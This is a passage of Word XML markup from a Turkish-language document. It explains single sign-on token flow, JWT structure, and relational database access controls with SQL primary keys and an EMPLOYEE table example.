    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> A uygulaması bu Token’ı M uygulamasına gönderir ve M uygulaması bu Token’ı çerez olarak kaydeder ve A uygulamasına yönlendirir. A uygulaması gelen istekteki Token’ı bulur ve Token giriş yapılmış olan kullanıcı ile eşleşirse başarılı bir giriş yapılmış olur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Aynı kullanıcı başka bir uygulama olan B uygulamasına giriş yapmak istediğinde M uygulamasına yönlendirilir. Burada M uygulaması kayıtlı olan çerez var mı diye kontrol eder ve çerezi bulur. Bulduğu çerezin içerisinde bulunan Token’ı B uygulamasına gönderir ve B uygulaması da M de bulunan servis sayesinde bu Token’a ait olan kullanıcı çekerek giriş işlemini gerçekleştirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1.4 SSO’nun Faydaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Farklı kullanıcı ve şifrelerden oluşabilecek şifre külfetini azaltır. Tek bir algoritma, tek bir database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kullanıcıların aynı bilgilerle girebileceği uygulamalara tekrar kullanıcı adı ve şifre girmesini engeller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Giriş yapan kullanıcılar bir çatı altına toplanarak daha düzenli ve sistematik bir sistem oluşur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Uygulamaların oturum açma işlemleri için ekstra işlemler gerçekleştirmesine gerek kalmaz. Tüm işlemler Identity Provider olarak adlandırılan uygulamada gerçekleştirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Token Nedir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Oluşturulacak olan Token’ leri yaratma yöntemlerinden biri JWT (JSON Web Tokens) dir. JWT toplam 3 bölümden oluşur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Header</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Signature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Header bölümü içerisinde iki adet tanımlama bulunur. Hangi hash algoritması kullanılacak ve oluşturulacak olan Token’in tipi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Payload bölümü claims leri içeren bölümdür. Bu bölümü tanımlamak zorunlu değil fakat istenilen veriler bu bölümde saklanmaktadır. Claimsler genelde kullanıcı bilgisi içeren bölümdür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Signature bölümü imzanın oluşturulduğu yerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Bu üç bölüm “.” karakteriyle birleşerek Token’i oluşturu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029470F8" wp14:editId="13BE78D1">
            <wp:extent cx="4656842" cy="1904215"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270"/>
            <wp:docPr id="25" name="Resim 3" descr="http://pms.sistemacik.com/content/images/2016/08/Screenshot_1.png">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA727FD2-EA62-4802-BA95-4264D6578D7F}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="Resim 3" descr="http://pms.sistemacik.com/content/images/2016/08/Screenshot_1.png">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA727FD2-EA62-4802-BA95-4264D6578D7F}"/>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9966" cy="1909581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2. Relational Data Base Access Controls Using SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Günümüzde sıkça kullandığımız bir çok veritabanı sistemi mimari olarak ilişkisel veritabanı  modelini kullanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> İlişkisel Veritabanı Yönetim Sistemi (Relational Database Management System kısaca RDBMS) olarak adlandırılan bu sistemler veritabanının sağlıklı şekilde çalışması ,veri tutarlılığı ve veri bütünlüğü gibi konularda bize oldukça büyük faydalar sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Örneği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Örneğin, aşağıdakiler EMPLOYEE ilişkisi için bir ilişki şemasıdır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>EMPLOYEE (NAME, DEPT, RANK, OFFICE, SALARY, SUPERVISO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0D2DAF8A" wp14:editId="2CB401CC">
            <wp:extent cx="4854805" cy="1131217"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Resim 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04E542D-0888-40A4-BA88-448A0A656F4D}"/>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04E542D-0888-40A4-BA88-448A0A656F4D}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4897183" cy="1141091"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.1 Primary Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>İlişkilerimizi tabloların anahtar sütunları arasında bağlantılar kurarak yaparız. Peki nedir bu anahtar sütunlar?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tablomuzda tuttuğumuz her bir kayıta ait verilere ulaşmak için bir yada birden fazla sütunu seçerek o sütun üzerinden verilerimize ulaşırız.Yani belirlediğimiz sütun bizim kayıta ulaşmamız için bir nevi aracı görevi görü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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10B5BF96" wp14:editId="2783941E">
            <wp:extent cx="5760720" cy="1108075"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="27" name="Resim 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F139E656-EE09-49E2-9BE8-75706A883A27}"/>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139E656-EE09-49E2-9BE8-75706A883A27}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1108075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Yukarıdaki Tablodan yola çıkalım. Murat’ın Bilgilerine ulaşmak istediğimizde veritabanımız dan adı “Murat” olan kişinin bilgilerini getirmesini isteriz. Veritabanı Adı sütununa giderek buradaki veriler içerisinde “Murat” verisini arar. Arama sonucu olumlu ise bulduğu sonucu bize gösterir.  Bu şekilde yaptığımız aramalar bazı sorunları da beraberinde getirmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Aynı isimde yada soy isimde farklı çalışanlarımız olabilir. Böyle bir durumda adı “Murat” olarak kayıtlı tüm kişilerin bilgileri bize gösterilir. Bu sorunu önlemek için her bir kayıtı eşsiz ve benzersiz şekilde tanımlayan (Yani aynı ve boş (NULL) veri içermeyen) sütun belirler. İşlemlerimizi o sütun üzerinden yaparız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Yukarıdaki tablomuzda “Personel No” sütunu bu görevi görmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“Personel No = 3” olan kayıtı görmek istediğimizde karşımıza Yeşim Güler’in kayıtı çıkacaktır.  Bu şekilde her bir kayıtı eşsiz ve benzersiz şekilde tanımlayan sütunlar Anahtar Sütunlardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pP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Pr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.2 SQL İfadeleri</w:t>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2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Employee örneği için SQL’de ilişki şemasını tanımlayalım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu ifade, altı sütunlu Employee adlı bir tablo oluşturur. AD, DEPT, RANK, OFİS ve SUPERVISOR sütunları karakter içeriyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SALARY sütunu, değer olarak (belirtilmemiş uzunlukta)tamsayı değerleri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">NAME birincil anahtardır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DEPT, DEPARTMENT tablosunun birincil anahtarına başvuran yabancı bir anahtardır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
